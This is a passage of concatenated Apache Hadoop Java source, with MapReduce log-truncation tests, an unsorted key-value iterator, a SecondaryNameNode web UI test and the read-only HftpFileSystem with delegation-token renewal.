JobConf clusterConf = new JobConf();
clusterConf.setLong(TaskLogsTruncater.MAP_USERLOG_RETAIN_SIZE, LSIZE);
clusterConf.setLong(TaskLogsTruncater.REDUCE_USERLOG_RETAIN_SIZE, LSIZE);
mr = new MiniMRCluster(1, "file:///", 3, null, null, clusterConf);
JobConf conf = mr.createJobConf();
Path inDir = new Path(TEST_ROOT_DIR + "/input");
Path outDir = new Path(TEST_ROOT_DIR + "/output");
FileSystem fs = FileSystem.get(conf);
if (fs.exists(outDir)) {
fs.delete(outDir, true);
}
if (!fs.exists(inDir)) {
fs.mkdirs(inDir);
}
String input = "The quick brown fox jumped over the lazy dog";
DataOutputStream file = fs.create(new Path(inDir, "part-0"));
file.writeBytes(input);
file.close();
conf.setInputFormat(TextInputFormat.class);
conf.setOutputKeyClass(LongWritable.class);
conf.setOutputValueClass(Text.class);
FileInputFormat.setInputPaths(conf, inDir);
FileOutputFormat.setOutputPath(conf, outDir);
conf.setNumMapTasks(1);
conf.setNumReduceTasks(0);
conf.setMapperClass(LoggingMapper.class);
RunningJob job = JobClient.runJob(conf);
assertTrue(job.getJobState() == JobStatus.SUCCEEDED);
long maxLength = 10000 + truncatedMsgSize;
// Log truncation may happen a few seconds after job completion, since the
// JVM may not exit until sleepTimeBeforeSigKill has expired. Only once
// the JVM has exited will the logs be truncated. Loop here to give
// it a chance to do truncation.
boolean truncated = false;
long stopLoopingTime = System.currentTimeMillis() + 20000;
while (!truncated) {
boolean expired = System.currentTimeMillis() > stopLoopingTime;
for (TaskCompletionEvent tce : job.getTaskCompletionEvents(0)) {
long length =
TaskLog.getTaskLogFile(tce.getTaskAttemptId(), false,
TaskLog.LogName.STDOUT).length();
truncated = length <= maxLength;
if (!truncated && expired) {
fail("STDOUT log file length for " + tce.getTaskAttemptId()
+ " is " + length + " and not <=" + maxLength);
}
if (tce.isMap) {
String stderr = TestMiniMRMapRedDebugScript.readTaskLog(
LogName.STDERR, tce.getTaskAttemptId(), false);
System.out.println("STDERR log:" + stderr);
assertTrue(stderr.equals(STDERR_LOG));
}
}
try {
Thread.sleep(1000);
} catch (InterruptedException e) {
throw new RuntimeException(e);
}
}
} finally {
if (mr != null) {
mr.shutdown();
}
}
}
/**
* Test the truncation of DEBUGOUT file by {@link TaskLogsTruncater}
* @throws IOException
*/
@Test
@Ignore // Truncation is now done in the Child JVM, because the TaskTracker
// no longer has write access to the user log dir. MiniMRCluster
// needs to be modified to put the config params set here in a config
// on the Child's classpath
public void testDebugLogsTruncationWithMiniMR() throws IOException {
MiniMRCluster mr = null;
try {
final long LSIZE = 10000L;
JobConf clusterConf = new JobConf();
clusterConf.setLong(TaskLogsTruncater.MAP_USERLOG_RETAIN_SIZE, LSIZE);
clusterConf.setLong(TaskLogsTruncater.REDUCE_USERLOG_RETAIN_SIZE, LSIZE);
mr = new MiniMRCluster(1, "file:///", 3, null, null, clusterConf);
JobConf conf = mr.createJobConf();
Path inDir = new Path(TEST_ROOT_DIR + "/input");
Path outDir = new Path(TEST_ROOT_DIR + "/output");
FileSystem fs = FileSystem.get(conf);
if (fs.exists(outDir)) {
fs.delete(outDir, true);
}
if (!fs.exists(inDir)) {
fs.mkdirs(inDir);
}
String input = "The quick brown fox jumped over the lazy dog";
DataOutputStream file = fs.create(new Path(inDir, "part-0"));
file.writeBytes(input);
file.close();
conf.setInputFormat(TextInputFormat.class);
conf.setOutputKeyClass(LongWritable.class);
conf.setOutputValueClass(Text.class);
FileInputFormat.setInputPaths(conf, inDir);
FileOutputFormat.setOutputPath(conf, outDir);
conf.setNumMapTasks(1);
conf.setMaxMapAttempts(1);
conf.setNumReduceTasks(0);
conf.setMapperClass(TestMiniMRMapRedDebugScript.MapClass.class);
// copy debug script to cache from local file system.
Path scriptPath = new Path(TEST_ROOT_DIR, "debug-script.txt");
String debugScriptContent =
"for ((i=0;i<1000;i++)); " + "do "
+ "echo \"Lots of logs! Lots of logs! "
+ "Waiting to be truncated! Lots of logs!\";" + "done";
DataOutputStream scriptFile = fs.create(scriptPath);
scriptFile.writeBytes(debugScriptContent);
scriptFile.close();
new File(scriptPath.toUri().getPath()).setExecutable(true);
URI uri = scriptPath.toUri();
DistributedCache.createSymlink(conf);
DistributedCache.addCacheFile(uri, conf);
conf.setMapDebugScript(scriptPath.toUri().getPath());
RunningJob job = null;
try {
JobClient jc = new JobClient(conf);
job = jc.submitJob(conf);
try {
jc.monitorAndPrintJob(conf, job);
} catch (InterruptedException e) {
//
}
} catch (IOException ioe) {
} finally{
long maxLength = 10000 + truncatedMsgSize;
boolean truncated = false;
long stopLoopingTime = System.currentTimeMillis() + 20000;
while (!truncated) {
boolean expired = System.currentTimeMillis() > stopLoopingTime;
for (TaskCompletionEvent tce : job.getTaskCompletionEvents(0)) {
File debugOutFile =
TaskLog.getTaskLogFile(tce.getTaskAttemptId(), false,
TaskLog.LogName.DEBUGOUT);
assertTrue("DEBUGOUT log file for " + tce.getTaskAttemptId() +
" should exist", !expired || debugOutFile.exists());
if (debugOutFile.exists()) {
long length = debugOutFile.length();
truncated = length == maxLength;
assertTrue("DEBUGOUT log file length for " + tce.getTaskAttemptId()
+ " is " + length + " and not " + maxLength,
truncated || !expired);
}
}
try {
Thread.sleep(1000);
} catch (InterruptedException e) {
throw new RuntimeException(e);
}
}
}
} finally {
if (mr != null) {
mr.shutdown();
}
}
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/UnsortedKVIterator.java<|end_filename|>
package org.apache.hadoop.mapred;
import java.io.IOException;
import java.util.Collections;
import java.util.List;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.io.DataInputBuffer;
import org.apache.hadoop.io.compress.CompressionCodec;
import org.apache.hadoop.util.Progress;
import org.apache.hadoop.util.Progressable;
public class UnsortedKVIterator<K extends Object, V extends Object> implements RawKeyValueIterator
{
private static final Log LOG = LogFactory.getLog(UnsortedKVIterator.class);
// fields
private Configuration conf;
private FileSystem fs;
private CompressionCodec codec;
private List<Segment<K, V>> segments = null;
private Progressable reporter;
private Progress mergeProgress = new Progress();
// context
private long totalBytesProcessed = 0;
private float progPerByte;
private DataInputBuffer key;
private DataInputBuffer value;
private Segment<K, V> currentSegment = null;
private int current = 0;
private Counters.Counter readsCounter = null;
public UnsortedKVIterator(Configuration conf, FileSystem fs, List<Segment<K, V>> segments,
Progressable reporter, boolean sortSegments)
{
this.conf = conf;
this.fs = fs;
this.segments = segments;
this.reporter = reporter;
if (sortSegments)
{
Collections.sort(segments);
}
}
public UnsortedKVIterator(Configuration conf, FileSystem fs, List<Segment<K, V>> segments,
Progressable reporter, boolean sortSegments, CompressionCodec codec)
{
this(conf, fs, segments, reporter, sortSegments);
this.codec = codec;
}
public RawKeyValueIterator merge(Counters.Counter readsCounter, Counters.Counter writesCounter,
Progress mergePhase) throws IOException
{
LOG.info("Feeding " + segments.size() + " unsorted segments to reduce");
if (mergePhase != null)
{
mergeProgress = mergePhase;
}
this.readsCounter = readsCounter;
long totalBytes = computeBytesInMerges();
if (totalBytes != 0)
{
progPerByte = 1.0f / (float) totalBytes;
}
return this;
}
private long computeBytesInMerges()
{
long result = 0;
for (Segment<K, V> seg : segments)
{
result += seg.getLength();
}
return result;
}
@Override
public void close() throws IOException
{
// do nothing.
}
@Override
public DataInputBuffer getKey() throws IOException
{
return key;
}
@Override
public DataInputBuffer getValue() throws IOException
{
return value;
}
@Override
public Progress getProgress()
{
return mergeProgress;
}
@Override
public boolean next() throws IOException
{
if (current >= segments.size())
return false;
if (currentSegment == null)
{
currentSegment = segments.get(current);
currentSegment.init(readsCounter);
}
long startPos = currentSegment.getPosition();
boolean hasNext = currentSegment.nextRawKey();
long endPos = currentSegment.getPosition();
totalBytesProcessed += endPos - startPos;
if (!hasNext)
{
currentSegment.close();
current++;
currentSegment = null;
return next();
}
startPos = currentSegment.getPosition();
key = currentSegment.getKey();
value = currentSegment.getValue();
endPos = currentSegment.getPosition();
totalBytesProcessed += endPos - startPos;
mergeProgress.set(totalBytesProcessed * progPerByte);
return true;
}
}
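// Illustrative sketch (not part of the original file): callers obtain the
// iterator from merge(...) and then drive it like any other
// RawKeyValueIterator; the counter and progress arguments are assumptions.
//
//   RawKeyValueIterator it = new UnsortedKVIterator<K, V>(conf, fs, segments,
//       reporter, false).merge(readsCounter, writesCounter, mergePhase);
//   while (it.next()) {
//     DataInputBuffer k = it.getKey();
//     DataInputBuffer v = it.getValue();
//     // consume the raw key/value bytes here
//   }
//   it.close();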
<|start_filename|>src/test/org/apache/hadoop/hdfs/server/namenode/TestSecondaryWebUi.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.server.namenode;
import static org.junit.Assert.*;
import java.io.IOException;
import java.net.URL;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hdfs.DFSConfigKeys;
import org.apache.hadoop.hdfs.DFSTestUtil;
import org.apache.hadoop.hdfs.MiniDFSCluster;
import org.junit.Test;
public class TestSecondaryWebUi {
@SuppressWarnings("deprecation")
@Test
public void testSecondaryWebUi() throws IOException {
Configuration conf = new Configuration();
conf.set(DFSConfigKeys.DFS_NAMENODE_SECONDARY_HTTP_ADDRESS_KEY,
"0.0.0.0:0");
MiniDFSCluster cluster = null;
SecondaryNameNode snn = null;
try {
cluster = new MiniDFSCluster(conf, 0, true, null);
cluster.waitActive();
snn = new SecondaryNameNode(conf);
String pageContents = DFSTestUtil.urlGet(new URL("http://localhost:" +
SecondaryNameNode.getHttpAddress(conf).getPort() + "/status.jsp"));
assertTrue(pageContents.contains("Last Checkpoint Time"));
} finally {
if (cluster != null) {
cluster.shutdown();
}
if (snn != null) {
snn.shutdown();
}
}
}
}
<|start_filename|>src/hdfs/org/apache/hadoop/hdfs/HftpFileSystem.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.io.InputStream;
import java.lang.ref.WeakReference;
import java.net.HttpURLConnection;
import java.net.InetSocketAddress;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URL;
import java.security.PrivilegedExceptionAction;
import java.text.ParseException;
import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.TimeZone;
import java.util.concurrent.DelayQueue;
import java.util.concurrent.Delayed;
import java.util.concurrent.TimeUnit;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.ContentSummary;
import org.apache.hadoop.fs.FSDataInputStream;
import org.apache.hadoop.fs.FSDataOutputStream;
import org.apache.hadoop.fs.FileChecksum;
import org.apache.hadoop.fs.FileStatus;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.MD5MD5CRC32FileChecksum;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.fs.permission.FsPermission;
import org.apache.hadoop.hdfs.security.token.delegation.DelegationTokenIdentifier;
import org.apache.hadoop.hdfs.server.namenode.JspHelper;
import org.apache.hadoop.hdfs.server.namenode.NameNode;
import org.apache.hadoop.hdfs.tools.DelegationTokenFetcher;
import org.apache.hadoop.io.Text;
import org.apache.hadoop.ipc.RemoteException;
import org.apache.hadoop.net.NetUtils;
import org.apache.hadoop.security.Credentials;
import org.apache.hadoop.security.SecurityUtil;
import org.apache.hadoop.security.UserGroupInformation;
import org.apache.hadoop.security.token.Token;
import org.apache.hadoop.security.token.TokenIdentifier;
import org.apache.hadoop.util.Progressable;
import org.apache.hadoop.util.ServletUtil;
import org.xml.sax.Attributes;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.DefaultHandler;
import org.xml.sax.helpers.XMLReaderFactory;
import org.apache.hadoop.hdfs.ByteRangeInputStream;
/** An implementation of a protocol for accessing filesystems over HTTP.
* The following implementation provides a limited, read-only interface
* to a filesystem over HTTP.
* @see org.apache.hadoop.hdfs.server.namenode.ListPathsServlet
* @see org.apache.hadoop.hdfs.server.namenode.FileDataServlet
*/
public class HftpFileSystem extends FileSystem {
static {
HttpURLConnection.setFollowRedirects(true);
}
private static final int DEFAULT_PORT = 50470;
protected InetSocketAddress nnAddr;
protected UserGroupInformation ugi;
private String nnHttpUrl;
private URI hdfsURI;
public static final String HFTP_TIMEZONE = "UTC";
public static final String HFTP_DATE_FORMAT = "yyyy-MM-dd'T'HH:mm:ssZ";
private Token<DelegationTokenIdentifier> delegationToken;
public static final String HFTP_SERVICE_NAME_KEY = "hdfs.service.host_";
public static final SimpleDateFormat getDateFormat() {
final SimpleDateFormat df = new SimpleDateFormat(HFTP_DATE_FORMAT);
df.setTimeZone(TimeZone.getTimeZone(HFTP_TIMEZONE));
return df;
}
protected static final ThreadLocal<SimpleDateFormat> df =
new ThreadLocal<SimpleDateFormat>() {
protected SimpleDateFormat initialValue() {
return getDateFormat();
}
};
@Override
protected int getDefaultPort() {
return DEFAULT_PORT;
}
@Override
public String getCanonicalServiceName() {
return SecurityUtil.buildDTServiceName(hdfsURI, getDefaultPort());
}
@SuppressWarnings("unchecked")
@Override
public void initialize(final URI name, final Configuration conf)
throws IOException {
super.initialize(name, conf);
setConf(conf);
this.ugi = UserGroupInformation.getCurrentUser();
nnAddr = NetUtils.createSocketAddr(name.toString());
StringBuilder sb = new StringBuilder("https://");
sb.append(NetUtils.normalizeHostName(name.getHost()));
sb.append(":");
sb.append(conf.getInt("dfs.https.port", DEFAULT_PORT));
nnHttpUrl = sb.toString();
String key = HftpFileSystem.HFTP_SERVICE_NAME_KEY+
SecurityUtil.buildDTServiceName(name, DEFAULT_PORT);
LOG.debug("Trying to find DT for " + name + " using key=" + key +
"; conf=" + conf.get(key, ""));
String nnServiceName = conf.get(key);
int nnPort = NameNode.DEFAULT_PORT;
if (nnServiceName != null) {
nnPort = NetUtils.createSocketAddr(nnServiceName,
NameNode.DEFAULT_PORT).getPort();
}
sb = new StringBuilder("hdfs://");
sb.append(nnAddr.getHostName());
sb.append(":");
sb.append(nnPort);
try {
hdfsURI = new URI(sb.toString());
} catch (URISyntaxException ue) {
throw new IOException("bad uri for hdfs", ue);
}
if (UserGroupInformation.isSecurityEnabled()) {
//try finding a token for this namenode (esp applicable for tasks
//using hftp). If there exists one, just set the delegationField
String canonicalName = getCanonicalServiceName();
for (Token<? extends TokenIdentifier> t : ugi.getTokens()) {
if (DelegationTokenIdentifier.HDFS_DELEGATION_KIND.equals(t.getKind()) &&
t.getService().toString().equals(canonicalName)) {
LOG.debug("Found existing DT for " + name);
delegationToken = (Token<DelegationTokenIdentifier>) t;
break;
}
}
//since we don't already have a token, go get one over https
if (delegationToken == null) {
delegationToken =
(Token<DelegationTokenIdentifier>) getDelegationToken(null);
renewer.addTokenToRenew(this);
}
}
}
@Override
public synchronized Token<?> getDelegationToken(final String renewer) throws IOException {
try {
//Renew TGT if needed
ugi.checkTGTAndReloginFromKeytab();
return ugi.doAs(new PrivilegedExceptionAction<Token<?>>() {
public Token<?> run() throws IOException {
Credentials c;
try {
c = DelegationTokenFetcher.getDTfromRemote(nnHttpUrl, renewer);
} catch (Exception e) {
LOG.info("Couldn't get a delegation token from " + nnHttpUrl +
" using https.");
LOG.debug("error was ", e);
//Maybe the server is in insecure mode (that's bad but okay)
return null;
}
for (Token<? extends TokenIdentifier> t : c.getAllTokens()) {
LOG.debug("Got dt for " + getUri() + ";t.service="
+t.getService());
t.setService(new Text(getCanonicalServiceName()));
return t;
}
return null;
}
});
} catch (InterruptedException e) {
throw new RuntimeException(e);
}
}
@Override
public URI getUri() {
try {
return new URI("hftp", null, nnAddr.getHostName(), nnAddr.getPort(),
null, null, null);
} catch (URISyntaxException e) {
return null;
}
}
/**
* ugi parameter for http connection
*
* @return user_shortname,group1,group2...
*/
private String getEncodedUgiParameter() {
StringBuilder ugiParameter = new StringBuilder(
ServletUtil.encodeQueryValue(ugi.getShortUserName()));
for(String g: ugi.getGroupNames()) {
ugiParameter.append(",");
ugiParameter.append(ServletUtil.encodeQueryValue(g));
}
return ugiParameter.toString();
}
/**
* Return a URL pointing to given path on the namenode.
*
* @param path to obtain the URL for
* @param query string to append to the path
* @return namenode URL referring to the given path
* @throws IOException on error constructing the URL
*/
URL getNamenodeURL(String path, String query) throws IOException {
final URL url = new URL("http", nnAddr.getHostName(),
nnAddr.getPort(), path + '?' + query);
if (LOG.isTraceEnabled()) {
LOG.trace("url=" + url);
}
return url;
}
/**
* Open an HTTP connection to the namenode to read file data and metadata.
* @param path The path component of the URL
* @param query The query component of the URL
*/
protected HttpURLConnection openConnection(String path, String query)
throws IOException {
query = addDelegationTokenParam(query);
final URL url = getNamenodeURL(path, query);
HttpURLConnection connection = (HttpURLConnection)url.openConnection();
connection.setRequestMethod("GET");
connection.connect();
return connection;
}
protected String addDelegationTokenParam(String query) throws IOException {
String tokenString = null;
if (UserGroupInformation.isSecurityEnabled()) {
synchronized (this) {
if (delegationToken != null) {
tokenString = delegationToken.encodeToUrlString();
return (query + JspHelper.getDelegationTokenUrlParam(tokenString));
}
}
}
return query;
}
@Override
public FSDataInputStream open(Path f, int buffersize) throws IOException {
String path = "/data" + ServletUtil.encodePath(f.toUri().getPath());
String query = addDelegationTokenParam("ugi=" + getEncodedUgiParameter());
URL u = getNamenodeURL(path, query);
return new FSDataInputStream(new ByteRangeInputStream(u));
}
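// Illustrative sketch (not part of the original file): hftp is normally used
// through the generic FileSystem API; the host, port, and path below are
// hypothetical.
//
//   Configuration conf = new Configuration();
//   FileSystem fs = FileSystem.get(
//       URI.create("hftp://namenode.example.com:50070/"), conf);
//   FSDataInputStream in = fs.open(new Path("/user/someone/part-00000"), 4096);
//   // read-only filesystem: create/rename/delete/mkdirs all throw IOException
//   in.close();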
/** Class to parse and store a listing reply from the server. */
class LsParser extends DefaultHandler {
ArrayList<FileStatus> fslist = new ArrayList<FileStatus>();
public void startElement(String ns, String localname, String qname,
Attributes attrs) throws SAXException {
if ("listing".equals(qname)) return;
if (!"file".equals(qname) && !"directory".equals(qname)) {
if (RemoteException.class.getSimpleName().equals(qname)) {
throw new SAXException(RemoteException.valueOf(attrs));
}
throw new SAXException("Unrecognized entry: " + qname);
}
long modif;
long atime = 0;
try {
final SimpleDateFormat ldf = df.get();
modif = ldf.parse(attrs.getValue("modified")).getTime();
String astr = attrs.getValue("accesstime");
if (astr != null) {
atime = ldf.parse(astr).getTime();
}
} catch (ParseException e) { throw new SAXException(e); }
FileStatus fs = "file".equals(qname)
? new FileStatus(
Long.valueOf(attrs.getValue("size")).longValue(), false,
Short.valueOf(attrs.getValue("replication")).shortValue(),
Long.valueOf(attrs.getValue("blocksize")).longValue(),
modif, atime, FsPermission.valueOf(attrs.getValue("permission")),
attrs.getValue("owner"), attrs.getValue("group"),
new Path(getUri().toString(), attrs.getValue("path"))
.makeQualified(HftpFileSystem.this))
: new FileStatus(0L, true, 0, 0L,
modif, atime, FsPermission.valueOf(attrs.getValue("permission")),
attrs.getValue("owner"), attrs.getValue("group"),
new Path(getUri().toString(), attrs.getValue("path"))
.makeQualified(HftpFileSystem.this));
fslist.add(fs);
}
private void fetchList(String path, boolean recur) throws IOException {
try {
XMLReader xr = XMLReaderFactory.createXMLReader();
xr.setContentHandler(this);
HttpURLConnection connection = openConnection(
"/listPaths" + ServletUtil.encodePath(path),
"ugi=" + getEncodedUgiParameter() + (recur ? "&recursive=yes" : ""));
InputStream resp = connection.getInputStream();
xr.parse(new InputSource(resp));
} catch(SAXException e) {
final Exception embedded = e.getException();
if (embedded != null && embedded instanceof IOException) {
throw (IOException)embedded;
}
throw new IOException("invalid xml directory content", e);
}
}
public FileStatus getFileStatus(Path f) throws IOException {
fetchList(f.toUri().getPath(), false);
if (fslist.size() == 0) {
throw new FileNotFoundException("File does not exist: " + f);
}
return fslist.get(0);
}
public FileStatus[] listStatus(Path f, boolean recur) throws IOException {
fetchList(f.toUri().getPath(), recur);
if (fslist.size() > 0 && (fslist.size() != 1 || fslist.get(0).isDir())) {
fslist.remove(0);
}
return fslist.toArray(new FileStatus[0]);
}
public FileStatus[] listStatus(Path f) throws IOException {
return listStatus(f, false);
}
}
@Override
public FileStatus[] listStatus(Path f) throws IOException {
LsParser lsparser = new LsParser();
return lsparser.listStatus(f);
}
@Override
public FileStatus getFileStatus(Path f) throws IOException {
LsParser lsparser = new LsParser();
return lsparser.getFileStatus(f);
}
private class ChecksumParser extends DefaultHandler {
private FileChecksum filechecksum;
/** {@inheritDoc} */
public void startElement(String ns, String localname, String qname,
Attributes attrs) throws SAXException {
if (!MD5MD5CRC32FileChecksum.class.getName().equals(qname)) {
if (RemoteException.class.getSimpleName().equals(qname)) {
throw new SAXException(RemoteException.valueOf(attrs));
}
throw new SAXException("Unrecognized entry: " + qname);
}
filechecksum = MD5MD5CRC32FileChecksum.valueOf(attrs);
}
private FileChecksum getFileChecksum(String f) throws IOException {
final HttpURLConnection connection = openConnection(
"/fileChecksum" + ServletUtil.encodePath(f),
"ugi=" + getEncodedUgiParameter());
try {
final XMLReader xr = XMLReaderFactory.createXMLReader();
xr.setContentHandler(this);
xr.parse(new InputSource(connection.getInputStream()));
} catch(SAXException e) {
final Exception embedded = e.getException();
if (embedded != null && embedded instanceof IOException) {
throw (IOException)embedded;
}
throw new IOException("invalid xml directory content", e);
} finally {
connection.disconnect();
}
return filechecksum;
}
}
/** {@inheritDoc} */
public FileChecksum getFileChecksum(Path f) throws IOException {
final String s = makeQualified(f).toUri().getPath();
return new ChecksumParser().getFileChecksum(s);
}
@Override
public Path getWorkingDirectory() {
return new Path("/").makeQualified(this);
}
@Override
public void setWorkingDirectory(Path f) { }
/** This optional operation is not yet supported. */
public FSDataOutputStream append(Path f, int bufferSize,
Progressable progress) throws IOException {
throw new IOException("Not supported");
}
@Override
public FSDataOutputStream create(Path f, FsPermission permission,
boolean overwrite, int bufferSize,
short replication, long blockSize,
Progressable progress) throws IOException {
throw new IOException("Not supported");
}
@Override
public boolean rename(Path src, Path dst) throws IOException {
throw new IOException("Not supported");
}
/**
* @deprecated Use delete(path, boolean)
*/
@Deprecated
@Override
public boolean delete(Path f) throws IOException {
throw new IOException("Not supported");
}
@Override
public boolean delete(Path f, boolean recursive) throws IOException {
throw new IOException("Not supported");
}
@Override
public boolean mkdirs(Path f, FsPermission permission) throws IOException {
throw new IOException("Not supported");
}
/**
* A parser for parsing {@link ContentSummary} xml.
*/
private class ContentSummaryParser extends DefaultHandler {
private ContentSummary contentsummary;
/** {@inheritDoc} */
public void startElement(String ns, String localname, String qname,
Attributes attrs) throws SAXException {
if (!ContentSummary.class.getName().equals(qname)) {
if (RemoteException.class.getSimpleName().equals(qname)) {
throw new SAXException(RemoteException.valueOf(attrs));
}
throw new SAXException("Unrecognized entry: " + qname);
}
contentsummary = toContentSummary(attrs);
}
/**
* Connect to the name node and get content summary.
* @param path The path
* @return The content summary for the path.
* @throws IOException
*/
private ContentSummary getContentSummary(String path) throws IOException {
final HttpURLConnection connection = openConnection(
"/contentSummary" + ServletUtil.encodePath(path),
"ugi=" + getEncodedUgiParameter());
InputStream in = null;
try {
in = connection.getInputStream();
final XMLReader xr = XMLReaderFactory.createXMLReader();
xr.setContentHandler(this);
xr.parse(new InputSource(in));
} catch(FileNotFoundException fnfe) {
//the server may not support getContentSummary
return null;
} catch(SAXException saxe) {
final Exception embedded = saxe.getException();
if (embedded != null && embedded instanceof IOException) {
throw (IOException)embedded;
}
throw new IOException("Invalid xml format", saxe);
} finally {
if (in != null) {
in.close();
}
connection.disconnect();
}
return contentsummary;
}
}
/** Return the object represented in the attributes. */
private static ContentSummary toContentSummary(Attributes attrs
) throws SAXException {
final String length = attrs.getValue("length");
final String fileCount = attrs.getValue("fileCount");
final String directoryCount = attrs.getValue("directoryCount");
final String quota = attrs.getValue("quota");
final String spaceConsumed = attrs.getValue("spaceConsumed");
final String spaceQuota = attrs.getValue("spaceQuota");
if (length == null
|| fileCount == null
|| directoryCount == null
|| quota == null
|| spaceConsumed == null
|| spaceQuota == null) {
return null;
}
try {
return new ContentSummary(
Long.parseLong(length),
Long.parseLong(fileCount),
Long.parseLong(directoryCount),
Long.parseLong(quota),
Long.parseLong(spaceConsumed),
Long.parseLong(spaceQuota));
} catch(Exception e) {
throw new SAXException("Invalid attributes: length=" + length
+ ", fileCount=" + fileCount
+ ", directoryCount=" + directoryCount
+ ", quota=" + quota
+ ", spaceConsumed=" + spaceConsumed
+ ", spaceQuota=" + spaceQuota, e);
}
}
/** {@inheritDoc} */
public ContentSummary getContentSummary(Path f) throws IOException {
final String s = makeQualified(f).toUri().getPath();
final ContentSummary cs = new ContentSummaryParser().getContentSummary(s);
return cs != null? cs: super.getContentSummary(f);
}
/**
* An action that will renew and replace the hftp file system's delegation
* tokens automatically.
*/
private static class RenewAction implements Delayed {
// when should the renew happen
private long timestamp;
// a weak reference to the file system so that it can be garbage collected
private final WeakReference<HftpFileSystem> weakFs;
RenewAction(long timestamp, HftpFileSystem fs) {
this.timestamp = timestamp;
this.weakFs = new WeakReference<HftpFileSystem>(fs);
}
/**
* Get the delay until this event should happen.
*/
@Override
public long getDelay(TimeUnit unit) {
long millisLeft = timestamp - System.currentTimeMillis();
return unit.convert(millisLeft, TimeUnit.MILLISECONDS);
}
/**
* Compare two events in the same queue.
*/
@Override
public int compareTo(Delayed o) {
if (o.getClass() != RenewAction.class) {
throw new IllegalArgumentException("Illegal comparision to non-RenewAction");
}
RenewAction other = (RenewAction) o;
return timestamp < other.timestamp ? -1 :
(timestamp == other.timestamp ? 0 : 1);
}
/**
* Set a new time for the renewal. Can only be called when the action
* is not in the queue.
* @param newTime the new time
*/
public void setNewTime(long newTime) {
timestamp = newTime;
}
/**
* Renew or replace the delegation token for this file system.
* @return
* @throws IOException
*/
@SuppressWarnings("unchecked")
public boolean renew() throws IOException, InterruptedException {
final HftpFileSystem fs = weakFs.get();
if (fs != null) {
synchronized (fs) {
fs.ugi.checkTGTAndReloginFromKeytab();
fs.ugi.doAs(new PrivilegedExceptionAction<Void>() {
@Override
public Void run() throws Exception {
try {
DelegationTokenFetcher.renewDelegationToken(fs.nnHttpUrl,
fs.delegationToken);
} catch (IOException ie) {
try {
fs.delegationToken =
(Token<DelegationTokenIdentifier>) fs.getDelegationToken(null);
} catch (IOException ie2) {
throw new IOException("Can't renew or get new delegation token ",
ie);
}
}
return null;
}
});
}
}
return fs != null;
}
public String toString() {
StringBuilder result = new StringBuilder();
HftpFileSystem fs = weakFs.get();
if (fs == null) {
return "evaporated token renew";
}
synchronized (fs) {
result.append(fs.delegationToken);
}
result.append(" renew in ");
result.append(getDelay(TimeUnit.SECONDS));
result.append(" secs");
return result.toString();
}
}
/**
* A daemon thread that waits for the next file system to renew.
*/
private static class RenewerThread extends Thread {
private DelayQueue<RenewAction> queue = new DelayQueue<RenewAction>();
// wait for 95% of a day between renewals
private final int RENEW_CYCLE = (int) (0.95 * 24 * 60 * 60 * 1000);
public RenewerThread() {
super("HFTP Delegation Token Renewer");
setDaemon(true);
}
public void addTokenToRenew(HftpFileSystem fs) {
queue.add(new RenewAction(RENEW_CYCLE + System.currentTimeMillis(),fs));
}
public void run() {
RenewAction action = null;
while (true) {
try {
action = queue.take();
if (action.renew()) {
action.setNewTime(RENEW_CYCLE + System.currentTimeMillis());
queue.add(action);
}
action = null;
} catch (InterruptedException ie) {
return;
} catch (Exception ie) {
if (action != null) {
LOG.warn("Failure to renew token " + action, ie);
} else {
LOG.warn("Failure in renew queue", ie);
}
}
}
}
}
private static RenewerThread renewer = new RenewerThread();
static {
renewer.start();
}
}
<|start_filename|>src/hdfs/org/apache/hadoop/hdfs/server/namenode/NameNodeResourceChecker.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.server.namenode;
import java.io.File;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Collection;
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.DF;
import org.apache.hadoop.hdfs.DFSConfigKeys;
//import com.google.common.annotations.VisibleForTesting;
/**
*
* NameNodeResourceChecker provides a method -
